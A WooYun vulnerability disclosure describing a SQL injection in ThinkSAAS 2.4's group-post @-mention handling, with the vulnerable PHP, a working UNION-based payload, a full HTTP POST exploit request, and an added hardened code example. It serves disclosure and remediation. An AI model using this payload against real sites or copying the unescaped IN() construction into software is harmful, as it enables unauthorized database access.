Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0111518

Title: ThinkSAAS latest version SQL injection

Vendor: thinksaas.cn

Author: testing

Submitted: 2015-05-10 18:25

Fix time: 2015-08-13 18:26

Published: 2015-08-13 18:26

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-05-10: Details sent to the vendor, awaiting vendor response
2015-05-15: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-07-09: Details disclosed to core white hats and relevant domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

ThinkSAAS 2.4

Detailed description:

app\group\action\add.php, starting at line 60:

// execute topic post
case "do" :

    ...omitted...

    $groupid = intval ( $_POST ['groupid'] );
    $title = trim( $_POST ['title'] );

    $content = tsClean( $_POST ['content'] );
    $typeid = intval ( $_POST ['typeid'] );
    $tag = $_POST ['tag'];

    ...omitted...

    // handle @username mentions
    if (preg_match_all ( '/@/', $content, $at )) {
        // a mention runs from '@' to the next whitespace, '|' or ':' (or end of string)
        preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches );

        $unames = $matches [1];

        // extracted names are concatenated straight into the IN() list without escaping
        $ns = "'" . implode ( "','", $unames ) . "'";

        $csql = "username IN($ns)";

        if ($unames) {

            $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );

            foreach ( $query as $v ) {
                // rewrite @name as [@name:userid]; userid comes straight from the query result
                $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
                // "I mentioned you in a post<br />go take a look:"
                $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
                    'id' => $topicid
                ) );
                aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
            }
            $new ['group']->update ( 'group_topic', array (
                'topicid' => $topicid
            ), array (
                'content' => $content
            ) );
        }
    }

......省略......


The tsClean function:

function tsClean($text) {
    // strip leading/trailing whitespace and remove backslashes (undoes the addslashes() applied on input)
    $text = stripslashes(trim($text));
    //$text = br2nl($text); // convert <br> to \n
    ///////XSS start
    require_once 'thinksaas/xsshtml.class.php';
    $xss = new XssHtml($text);
    $text = $xss -> getHtml();
    //$text = substr ($text, 4);    // strip the leading <p> tag
    //$text = substr ($text, 0,-5); // strip the trailing </p> tag
    ///////XSS end
    //$text = html_entity_decode($text,ENT_NOQUOTES,"utf-8"); // convert HTML entities back to characters
    //$text = strip_tags($text); // strip HTML and PHP tags
    //$text = cleanJs ( $text );
    // convert characters to HTML entities; ENT_NOQUOTES leaves single and double quotes untouched
    $text = htmlentities($text, ENT_NOQUOTES, "utf-8");
    return $text;
}


$_POST['content'] is passed through addslashes() at initialisation. Inside tsClean, stripslashes() removes that escaping again, the XssHtml filter strips XSS payloads, and htmlentities() with ENT_NOQUOTES encodes HTML special characters but leaves single quotes intact; the result is assigned to $content.
preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); checks whether the post body @-mentions a user and, if so, extracts everything between the @ and the next whitespace, '|' or ':' as the user name.
$ns = "'" . implode ( "','", $unames ) . "'";
$csql = "username IN($ns)";
The extracted names end up in $csql unescaped, and the query $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" ); is executed,
so a single quote inside the mention closes the string literal and gives SQL injection.
The query result is then processed as follows.

$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );

foreach ( $query as $v ) {
    // rewrite @name as [@name:userid]; userid is whatever the query returned
    $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
    // "I mentioned you in a post<br />go take a look:"
    $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
        'id' => $topicid
    ) );
    aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
}
$new ['group']->update ( 'group_topic', array (
    'topicid' => $topicid
), array (
    'content' => $content
) );


Each @admin in the original post body is rewritten to the form [@admin:1111]; on display, [@admin:1111] is rendered as:
<a '="" uid="1111" rel="face" href="http://127.0.0.1/thinksaas/index.php?app=user&ac=space&id=1111 ">@admin</a>
so whatever the query returns in the userid column is written into the page, which makes the injection result visible.
Precondition: the system has two accounts, e.g. admin and test.
So construct the payload, setting content to:
<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
(/**/ is used in place of spaces because whitespace terminates the regex match for the mention.)
This executes select userid,username from user_info where username IN('admin')/**/union/**/select/**/version(),'test'#','test')
The UNION row (version(), 'test') is matched against the second mention @test, so the payload is rewritten to:
<p>aaaa [@admin:1111]')/**/union/**/select/**/version(),'test'# aaaaaa[@test:injection result] aaaa<br/></p>
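As an added example (not code from this report or from ThinkSAAS), the following PHP script replays the handling traced above on the report's payload: a stand-in for tsClean() that keeps only stripslashes() and htmlentities(ENT_NOQUOTES) (the XssHtml step is omitted on the assumption that it passes plain text through unchanged), the same mention regex, the vulnerable IN() construction, and a hardened variant that validates each extracted name against an assumed whitelist and binds the survivors as placeholders. The demo_* function names are this example's own, and dbprefix is left out.

```php
<?php
// Added example, not ThinkSAAS code: replays the string handling of
// app/group/action/add.php on the report's payload, then shows a hardened
// construction. Every demo_* name is this example's own; dbprefix is omitted.

// Stand-in for tsClean(): only the two steps that matter for the injection.
// The XssHtml whitelist filter between them is omitted on the assumption
// that it passes plain text through unchanged. ENT_NOQUOTES leaves ' untouched.
function demo_clean(string $text): string
{
    $text = stripslashes(trim($text)); // undoes the addslashes() done at init
    return htmlentities($text, ENT_NOQUOTES, 'utf-8');
}

// Same regex as the vulnerable code: a mention runs from '@' to the first
// whitespace, '|' or ':' (or end of string). Quotes, parentheses, '#', '/'
// and '*' are all accepted, which is why the payload separates keywords with /**/.
function demo_extract_mentions(string $content): array
{
    if (!preg_match_all('/@(.+?)([\s|:]|$)/is', $content, $m)) {
        return [];
    }
    return $m[1];
}

// Vulnerable construction, as in add.php: names concatenated into IN(...).
function demo_build_query_vulnerable(array $unames): string
{
    $ns = "'" . implode("','", $unames) . "'";
    return "select userid,username from user_info where username IN($ns)";
}

// Hardened construction: drop anything that is not a plausible user name
// (assumed policy: letters, digits, underscore, 1-32 characters), then bind
// the survivors as placeholders so the driver quotes them. Returns [sql, params].
function demo_build_query_safe(array $unames): array
{
    $valid = array_values(array_filter($unames, function ($u) {
        return preg_match('/^[\p{L}\p{N}_]{1,32}$/u', $u) === 1;
    }));
    if (!$valid) {
        return ['', []];
    }
    $placeholders = implode(',', array_fill(0, count($valid), '?'));
    return ["select userid,username from user_info where username IN($placeholders)", $valid];
}

// The report's payload as $_POST['content'] looks after the framework's
// addslashes() (constructed input).
$posted = addslashes("<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>");

$content = demo_clean($posted);
$unames  = demo_extract_mentions($content);
echo "extracted mentions: ", implode(' | ', $unames), PHP_EOL;

echo "vulnerable: ", demo_build_query_vulnerable($unames), PHP_EOL;

[$sql, $params] = demo_build_query_safe($unames);
echo "hardened:   ", $sql, "  params=", implode(',', $params), PHP_EOL;
```

Run with php on the command line. The vulnerable builder reproduces the statement quoted above, with the single quote and the UNION intact, while the hardened builder rejects the first "name" at the whitelist and binds only test as a parameter. Validating the mention before it reaches the query matters even with prepared statements, because the same name is also written back into the topic body and into the notification message.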
HTTP request:

POST /thinksaas/index.php?app=group&ac=add&ts=do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/thinksaas/index.php?app=group&ac=add&id=1
Cookie: c_secure_ssl=bm9wZQ%3D%3D; c_secure_uid=MQ%3D%3D; c_secure_pass=d2f4d9c199d480bde1c7527ab5f00f67; c_secure_tracker_ssl=bm9wZQ%3D%3D; c_secure_login=bm9wZQ%3D%3D; PHPSESSID=v56iku742gj03lrpu8dhmhqrn6; ts_autologin=6wgf4rovqk4c8ckso04wswosg0owwc0; ts_email=admin%40admin.com
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16131784015115
Content-Length: 788

-----------------------------16131784015115
Content-Disposition: form-data; name="title"

sql
-----------------------------16131784015115
Content-Disposition: form-data; name="content"

<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
-----------------------------16131784015115
Content-Disposition: form-data; name="tag"


-----------------------------16131784015115
Content-Disposition: form-data; name="iscomment"

0
-----------------------------16131784015115
Content-Disposition: form-data; name="iscommentshow"

0
-----------------------------16131784015115
Content-Disposition: form-data; name="groupid"

1
-----------------------------16131784015115
Content-Disposition: form-data; name="token"

79e185a1215f76ec26e0aa120ec8240f0eb3aa1a
-----------------------------16131784015115--


[Screenshot: QQ截图20150501174213.jpg]

Proof of vulnerability:

The official site sits behind a cloud WAF, so I only reproduced it locally.

Fix suggestion:

Copyright notice: please credit the source when reposting, testing@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-08-13 18:26

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None